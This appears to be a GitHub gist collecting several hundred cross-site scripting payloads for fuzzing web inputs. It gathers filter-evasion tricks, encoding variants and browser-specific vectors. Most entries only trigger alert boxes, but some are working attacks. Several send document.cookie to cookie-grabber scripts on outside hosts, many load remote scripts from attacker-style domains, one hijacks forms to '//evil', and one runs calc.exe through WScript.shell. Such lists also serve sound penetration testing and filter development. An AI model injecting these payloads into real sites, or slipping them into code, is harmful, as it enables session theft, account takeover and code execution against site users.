Created
December 29, 2016 22:25
-
-
Save sodejm/64f4f9a01122ef89f3d5ed6add4bbc4f to your computer and use it in GitHub Desktop.
customize list of xss payloads, much of the credit should go to fuzzdb/rsnake/lcamptuf. some are my own but many are just added over time from around the web
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"/><img src=x onerror=alert('sodejm')/> | |
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* | |
javascrip@Ωt://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a | |
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ | |
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* | |
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* | |
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// | |
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* | |
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* | |
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* | |
javascript://--></title></style></textarea></script><svg "//' onclick=alert()// | |
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* | |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// | |
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/sodejmXSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/4qmmRFj.png"> | |
< script > < / script> | |
< | |
< | |
< | |
< | |
< | |
<< | |
<<< | |
"><script>" | |
<script>alert("sodejmXSS")</script> | |
<<script>alert("sodejmXSS");//<</script> | |
<script>alert(document.cookie)</script> | |
'><script>alert(document.cookie)</script> | |
'><script>alert(document.cookie);</script> | |
";alert('sodejmXSS');// | |
%3cscript%3ealert("sodejmXSS");%3c/script%3e | |
%3cscript%3ealert(document.cookie);%3c%2fscript%3e | |
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E | |
<script>alert(document.cookie);</script> | |
<script>alert(document.cookie);<script>alert | |
<sodejmXSS><script>alert('sodejmXSS')</script></vulnerable> | |
<IMG%20SRC='javascript:alert(document.cookie)'> | |
<IMG SRC="javascript:alert('sodejmXSS');"> | |
<IMG SRC="javascript:alert('sodejmXSS')" | |
<IMG SRC=javascript:alert('sodejmXSS')> | |
<IMG SRC=JaVaScRiPt:alert('sodejmXSS')> | |
<IMG SRC=javascript:alert("sodejmXSS")> | |
<IMG SRC=`javascript:alert("'sodejmXSS'")`> | |
<IMG """><SCRIPT>alert("sodejmXSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG%20SRC='javasc ript:alert(document.cookie)'> | |
<IMG SRC="jav ascript:alert('sodejmXSS');"> | |
<IMG SRC="jav	ascript:alert('sodejmXSS');"> | |
<IMG SRC="jav
ascript:alert('sodejmXSS');"> | |
<IMG SRC="jav
ascript:alert('sodejmXSS');"> | |
<IMG SRC="  javascript:alert('sodejmXSS');"> | |
<IMG DYNSRC="javascript:alert('sodejmXSS')"> | |
<IMG LOWSRC="javascript:alert('sodejmXSS')"> | |
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
'%3CIFRAME%20SRC=javascript:alert(%2527sodejmXSS%2527)%3E%3C/IFRAME%3E | |
"><script>document.location='http://sodejm.com/cgi-bin/cookie.cgi?'???.cookie</script> | |
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fsodejm%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} | |
'';!--"<sodejmXSS>=&{()} | |
<name>','')); phpinfo(); exit;/*</name> | |
<![CDATA[<script>var n=0;while(true){n;}</script>]]> | |
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('sodejmXSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> | |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('sodejmXSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> | |
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('sodejmXSS');">]]> | |
<xml ID="sodejmXSS"><I><B><IMG SRC="javas<!-- -->cript:alert('sodejmXSS')"></B></I></xml><SPAN DATASRC="#sodejmXSS" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<img language=vbs src=<b onerror=alert#1/1#> | |
document.cookie='sodejmXSS=jackmasa;domain=.me.' | |
about://mmme.me | |
data://mmme.me | |
data:;//mmme.me/view/1#1,2 | |
xxx.innerHTML=document.title | |
data:message/rfc822 | |
<iframe><iframe src=javascript:alert(/sodejm/)></iframe> | |
<div id="alert(/sodejm/)" style="x:expression(eval)(id)"> | |
<script?=data:,alert(1)<!-- | |
<sVg><scRipt %00>prompt(/sodejm/) | |
<xml:namespace prefix=t><import namespace=t implementation=..... | |
<iframe srcdoc='<svg/onload=alert(/sodejm/)>'> | |
<script/%00%00v%00%00>alert(/sodejm/)</script> and %c0″//(%000000%0dalert(1)// | |
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/sodejm/)></svg>", false); | |
<h1 onerror=alert(/sodejm/)>sodejmXSS</h1><style>*:after{content:url()}</style> | |
<script for=_ event=onerror()>alert(/sodejm/)</script><img id=_ src=> | |
"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme | |
Components.lookupMethod(self, 'alert')(1) | |
external.NavigateAndFind(' ',[],[]) | |
<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> | |
<meta http-equiv=refresh content="0 javascript:alert(1)"> | |
<meta http-equiv=refresh content="?,javascript:alert(1)"> | |
<svg contentScriptType=text/vbs><script>MsgBox"sodejm"<i> | |
setTimeout(['alert(/sodejm/)']); #safari | |
<svg></ y="><x" onload=alert('sodejm')> #svg | |
Event.prototype[0]='sodejm',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert # | |
URL-redirect vuln == sodejmXSS ! Location:data:text/html,<svg/onload=alert(document.domain)> sodejm | |
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgnc29kZWptJyk8L3NjcmlwdD4K==">click</a> | |
<style>*{-o-link:'data:text/html,<svg/onload=alert(/sodejm/)>';-o-link-source:current}</style><a href=1>aaa | |
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/sodejm) | |
with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); | |
<svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #JustForFun | |
<a href=[0x0b]" onclick=alert(1)//">click</a> | |
<style>//<!--</style> -->*{x:expression(alert(/sodejm/))}//<style></style> | |
<!-- --!><input value="--><body/onload=`alert(/ sodejm /)//`"> #sodejmXSS | |
Input[hidden] sodejmXSS <input type=hidden style=`x:expression(alert(/ sodejm /))`> target it. | |
http://<img alt="evil/#" width=0 height=0 > | |
<![<img src=x:x onerror=`alert(/ sodejm /)//`]--> | |
<{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) | |
chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ | |
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ sodejm /\51')() | |
<iframe src="javascript:'<script src=>;</script>'"></iframe> | |
<svg><script>/**/alert(' sodejm ')//*/</script></svg> | |
[Sub XXX_OnError MsgBox " sodejm " End Sub] | |
if(1)alert(' sodejm ')}{ | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<![if<iframe/onload=vbs::alert[:]>, sodejm | |
<svg><script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊=> mix! | |
<! sodejmXSS="><img src=xx:x onerror=alert(1)//"> #Safari #sodejmXSS | |
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #sodejmXSS | |
header('Refresh: 0;url=javascript:alert(1)'); | |
<script language=vbs></script><img src=xx:x onerror="::alert' sodejm '::"> | |
<a href="data:text/html,<script>eval(name)</script>" target="alert(' sodejm ')">click</a> | |
<style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style> | |
for(location of ['javascript:alert(/ff/)']); | |
#E4X function::['location']='javascript'':alert(/FF/)' | |
<a href="javas	cri
pt:alert(' sodejm ')">test</a> | |
<a href="x:alert(1)" id="test">click</a> <script>eval(test'')</script> | |
<div style="color:rgb(''�x:expression(alert(URL=1))"></div> CSS and CSS :P | |
document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase()) | |
<1.7 $("button").val("<iframe src=vbscript:alert(1)>") | |
<script src=>alert(/IE|Opera/)</script> | |
<img src=//\ onload=alert(1)> | |
location='vbscript:alert(1)' | |
$.parseHTML('<img src=xx:X onerror=alert(1)>') | |
<img lowsrc=//google.com> | |
<img src=//isodejmXSS.sinaapp.com/sleep.php> | |
<iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>"> | |
<script/onload=alert(1)></script> | |
<style/onload=alert(1)> | |
<sodejmXSS>xs{[function::status]}s</sodejmXSS> | |
document.write('<img src="<iframe/onload=alert(1)>\0">') | |
?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> | |
<iframe srcdoc="<svg/onload=alert(domain)>"> | |
try{*}catch(e if(alert(1))){} | |
ß=ss <a href="http://ß.lv">click</a> | |
<a href="http://www。example。com">click</a> | |
<a href="http://﹤script﹥alert(1)﹤/script﹥" id=x>test</a><script>document.write(x.host);</script> | |
<a href="http://www﹒example﹒com ">click</a> | |
history.pushState([],[],'/sodejmXSSvector') | |
for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); | |
[<!ENTITY nbsp "'">] | |
<img src=javascript:while([{}]);> | |
<!--[if<img src=x:x onerror=alert(5)//]-->H5SC#115 | |
for(i=0;i<100;) find(); | |
<script>var location={};</script> | |
json={'x':'',x:location='1'} <script src=... charset=utf-7></script> | |
<iframe src=view-source://xxxx.com>; | |
<button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking <img src='//evil | |
// <iframe viewsource src="//test.de"></iframe> | |
<form name=location > clobbered location object on IE. | |
<form name=document><image name=body> clobbered document->body | |
<isindex formaction=javascript:alert(1)> | |
<img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script> | |
<a href="https://4294967298915183000">click</a>=>google | |
<a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> | |
<a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. | |
<svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> | |
and <a href="\/www.google.com/favicon.ico">click</a> | |
<a href="//ⓜⓜⓜⓔ︒ⓜⓔ">click</a> url trick | |
<script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> | |
<i/onclick=URL=name> less sodejmXSS,20 chars. | |
<a rel="noreferrer" href="//google.com">click</a> | |
<img src="jar:!/"> | |
No dos expression vector <i style=x:expression(alert(URL=1))> | |
<svg><style>*{font-family:'<svg onload=alert(1)>';}</style></svg> | |
<body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> Vbscript XHR | |
<svg/onload=domain=id> | |
<style>@import//evil? >>>steal me!<<< scriptless | |
<input value="<script>alert(1)</script>" ` /> | |
<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> | |
<a href="#" onclick="alert(' ');alert(2 ')">name</a> | |
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => sodejmXSS | |
<meta http-equiv="refresh" content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]"> | |
<link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > | |
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>, sodejm | |
<svg><animation x:href=javascript:alert(1)> SVG animation vector | |
<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> | |
<a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> | |
<noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non- | |
<svg><script xlink:href="data:,alert(1)"> | |
<math><maction actiontype="statusline#http://google.com" href="//evil"> | |
<svg><oooooo/oooooooooo/onload=alert(1) > | |
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome vector | |
<applet code=javascript:alert('sgl')> | |
<div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script> | |
<script>RuntimeObject("w*")["window"]["alert"](1);</script> | |
<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> | |
<!-- `<img/src=xx:xx onerror=alert(1)//--!>H5SC: | |
<a href="javascript:alert(1)">click</a> non- | |
<a href="feed:javascript:alert(1)">click</a> | |
<link href="javascript:alert(1)" rel="next"> | |
<embed code="http://businessinfo.co.uk/labs/sodejmXSS/sodejmXSS.swf" allowscriptaccess=always> | |
"><script>alert(0)</script> | |
<script src=http://yoursite.com/your_files.js></script> | |
</title><script>alert(/sodejmXSS/)</script> | |
</textarea><script>alert(/sodejmXSS/)</script> | |
<font style='color:expression(alert(document.cookie))'> | |
<img src="javascript:alert('sodejmXSS')"> | |
<script language="JavaScript">alert('sodejmXSS')</script> | |
[url=javascript:alert('sodejmXSS');]click me[/url] | |
<body onunload="javascript:alert('sodejmXSS');"> | |
<script>alert(1);</script> | |
<script>alert('sodejmXSS');</script> | |
<script src="http://www.evilsite.org/cookiegrabber.php"></script> | |
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script> | |
<scr<script>ipt>alert('sodejmXSS');</scr</script>ipt> | |
<script>alert(String.fromCharCode(88,83,83))</script> | |
<img src=foo.png onerror=alert(/sodejmXSSed/) /> | |
<style>@import'javascript:alert("sodejmXSS")';</style> | |
<? echo('<scr)'; echo('ipt>alert("sodejmXSS")</script>'); ?> | |
<marquee><script>alert('sodejmXSS')</script></marquee> | |
<IMG SRC="jav	ascript:alert('sodejmXSS');"> | |
<IMG SRC="jav
ascript:alert('sodejmXSS');"> | |
<IMG SRC="jav
ascript:alert('sodejmXSS'); | |
<body onLoad="alert('sodejmXSS');" | |
[color=red' onmouseover="alert('sodejmXSS')"]mouse over[/color] | |
"/></a></><img src=1.gif onerror=alert(1)> | |
window.alert("Bonjour !"); | |
<div style="x:expression((window.r==1)?'':eval('r=1; | |
alert(String.fromCharCode(88,83,83));'))"> | |
<iframe<?php echo chr(11)?> onload=alert('sodejmXSS')></iframe> | |
"><script alert(String.fromCharCode(88,83,83))</script> | |
'>><marquee><h1>sodejmXSS</h1></marquee> | |
'">><script>alert('sodejmXSS')</script> | |
'">><marquee><h1>sodejmXSS</h1></marquee> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('sodejmXSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('sodejmXSS');"> | |
<script>var var = 1; alert(var)</script> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('sodejmXSS')")}</STYLE> | |
<?='<SCRIPT>alert("sodejmXSS")</SCRIPT>'?> | |
<IMG SRC='vbscript:msgbox("sodejmXSS")'> | |
" onfocus=alert(document.domain) "> <" | |
<FRAMESET><FRAME SRC="javascript:alert('sodejmXSS');"></FRAMESET> | |
<STYLE>li {list-style-image: url("javascript:alert('sodejmXSS')");}</STYLE><UL><LI>sodejmXSS | |
perl -e 'print "<SCR\0IPT>alert("sodejmXSS")</SCR\0IPT>";' > out | |
perl -e 'print "<IMG SRC=java\0script:alert("sodejmXSS")>";' > out | |
<br size="&{alert('sodejmXSS')}"> | |
<scrscriptipt>alert(1)</scrscriptipt> | |
</br style=a:expression(alert())> | |
</script><script>alert(1)</script> | |
<SCRIPT>document.write("sodejmXSS");</SCRIPT> | |
a="get";b="URL";c="javascript:";d="alert('sodejmXSS');";eval(a?); | |
='><script>alert("sodejmXSS")</script> | |
<isindex action="javas	cript:alert(1)" type=image> | |
<script?=">"?="http://yoursite.com/sodejmXSS.js?69,69"></script> | |
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> | |
">/XaDoS/><script>alert(document.cookie)</script> | |
<script> src="http://www.site.com/sodejmXSS.js"></script> | |
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> | |
src="http://www.site.com/sodejmXSS.js"></script> | |
"><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("sodejmXSS")> | |
[color=red width=expression(alert(123))][color] | |
<BASE HREF="javascript:alert('sodejmXSS');//"> | |
Execute(MsgBox(chr(88)&chr(83)&chr(83)))< | |
"></iframe><script>alert(123)</script> | |
<body onLoad="while(true) alert('sodejmXSS');"> | |
'"></title><script>alert(1111)</script> | |
</textarea>'"><script>alert(document.cookie)</script> | |
'""><script language="JavaScript"> alert('X nS nS');</script> | |
</script></script><<<<script><>>>><<<script>alert(123)</script> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('sodejmXSS');"> | |
'></select><script>alert(123)</script> | |
'>"><script src = 'http://www.site.com/sodejmXSS.js'></script> | |
}</style><script>a=eval;b=alert;a(b(/sodejmXSS/.source));</script> | |
<html><noalert><noscript>(123)</noscript><script>(123)</script> | |
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("sodejmXSS")> | |
<SCRIPT/SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<<SCRIPT>alert("sodejmXSS");//<</SCRIPT> | |
<SCRIPT SRC=//0r.pe/.j> | |
<iframe src=http://0r.pe/scriptlet.html < | |
</TITLE><SCRIPT>alert("sodejmXSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('sodejmXSS');"> | |
<BODY BACKGROUND="javascript:alert('sodejmXSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('sodejmXSS')");}</STYLE><UL><LI>sodejmXSS</br> | |
<IMG SRC='vbscript:msgbox("sodejmXSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('sodejmXSS')> | |
<BGSOUND SRC="javascript:alert('sodejmXSS');"> | |
<BR SIZE="&{alert('sodejmXSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('sodejmXSS');"> | |
<LINK REL="stylesheet" HREF="http://0r.pe/sodejmXSS.css"> | |
<STYLE>@import'http://0r.pe/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://0r.pe/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://0r.pe/xssmoz.xml#sodejmXSS")}</STYLE> | |
<STYLE>@import'javascript:alert("sodejmXSS")';</STYLE> | |
<IMG STYLE="sodejmXSS:expr/*sodejmXSS*/ession(alert('sodejmXSS'))"> | |
<STYLE>.sodejmXSS{background-image:url("javascript:alert('sodejmXSS')");}</STYLE><A CLASS=sodejmXSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('sodejmXSS')")}</STYLE> | |
<sodejmXSS STYLE="sodejmXSS:expression(alert('sodejmXSS'))"> | |
<sodejmXSS STYLE="behavior: url(sodejmXSS.htc);"> | |
<a <!-- --> href="javascript:alert(-1)">hello</a> | |
<a href="javascript:alert(-1)" | |
<a href="javascript:alert%252831337%2529">Hello</a> | |
<a <!-- href="javascript:alert(31337);">Hello</a> | |
<img src="http://www.w3schools.com/tags/planets.gif" width="145" height="126" alt="Planets" usemap="#planetmap"><map name="planetmap"><area shape="rect" coords="0,0,145,126" a-=">" href="javascript:alert(-1)"></map> | |
" onhover="javascript:alert(-1)" | |
"><script>alert('test')</script> | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<SCRIPT SRC=http://0r.pe/sodejmXSS.js></SCRIPT> | |
<SCRIPT/sodejmXSS SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert("sodejmXSS")> | |
<SCRIPT SRC=http://0r.pe/sodejmXSS.js?<B> | |
<SCRIPT>a=/sodejmXSS/ | |
alert(a.source)</SCRIPT> | |
<LAYER SRC="http://0r.pe/ | |
scriptlet.html"></LAYER> | |
<STYLE>li {list-style-image: url("javascript:alert('sodejmXSS')");}</STYLE><UL><LI>sodejmXSS | |
<IMG SRC="mocha:[code]"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('sodejmXSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('sodejmXSS');"> | |
<IFRAME SRC="javascript:alert('sodejmXSS');"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('sodejmXSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('sodejmXSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('sodejmXSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('sodejmXSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('sodejmXSS'))"> | |
<DIV STYLE="width: expression(alert('sodejmXSS'));"> | |
<STYLE>@im\port'\ja\vasc\ript:alert("sodejmXSS")';</STYLE> | |
<IMG STYLE="sodejmXSS:expr/*sodejmXSS*ession(alert('sodejmXSS'))"> | |
exp/*<A STYLE='no\sodejmXSS:nosodejmXSS("**"); | |
sodejmXSS:ex/*sodejmXSS*//**pression(alert("sodejmXSS"))'> | |
<STYLE TYPE="text/javascript">alert('sodejmXSS');</STYLE> | |
<!--[if gte 4]><SCRIPT>alert('sodejmXSS');</SCRIPT><![endif]--> | |
<BASE HREF="javascript:alert('sodejmXSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://0r.pe/scriptlet.html"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('sodejmXSS')></OBJECT> | |
<EMBED SRC="http://0r.pe/sodejmXSS.swf" AllowScriptAccess="always"></EMBED> | |
<HTML xmlns:sodejmXSS><?import namespace="sodejmXSS" implementation="http://0r.pe/sodejmXSS.htc"><sodejmXSS:sodejmXSS>sodejmXSS</sodejmXSS:sodejmXSS></HTML> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('sodejmXSS');">]]> | |
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<XML ID="sodejmXSS"><I><B><IMG SRC="javas<!-- -->cript:alert('sodejmXSS')"></B></I></XML> | |
<SPAN DATASRC="#sodejmXSS" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |
<XML SRC="sodejmXSStest.xml" ID=I></XML> | |
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="sodejmXSS<SCRIPT DEFER>alert("sodejmXSS")</SCRIPT>"></BODY></HTML> | |
<SCRIPT SRC="http://0r.pe/sodejmXSS.jpg"></SCRIPT> | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('sodejmXSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD><SCRIPT>alert('sodejmXSS');</SCRIPT> | |
<SCRIPT a=">" SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://0r.pe/sodejmXSS.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">sodejmXSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">sodejmXSS</A> | |
<A HREF="http://1113982867/">sodejmXSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">sodejmXSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">sodejmXSS</A> | |
<A HREF="http://6	6.000146.0x7.147/">sodejmXSS</A> | |
<A HREF="//www.google.com/">sodejmXSS</A> | |
<A HREF="//google">sodejmXSS</A> | |
<A HREF="http://0r.pe@google">sodejmXSS</A> | |
<A HREF="http://google:0r.pe">sodejmXSS</A> | |
<A HREF="http://google.com/">sodejmXSS</A> | |
<A HREF="http://www.google.com./">sodejmXSS</A> | |
<A HREF="javascript:document.location='http://www.google.com/'">sodejmXSS</A> | |
<A HREF="http://www.gohttp://www.google.com/ogle.com/">sodejmXSS</A> | |
<iframe %00 src="	javascript:prompt(1)	"%00> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt %00>alert(1) {Opera} | |
<img/src=`%00` onerror=this.onerror=confirm | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=`%00`
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ | |
"><h1/onmouseover='\u0061lert(1)'>%00 | |
<iframe/src="data:text/html,<svg onload=alert(1)>" | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X | |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='hhttp://i.imgur.com/4qmmRFj.png' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {& Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe/%00/ src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/> | |
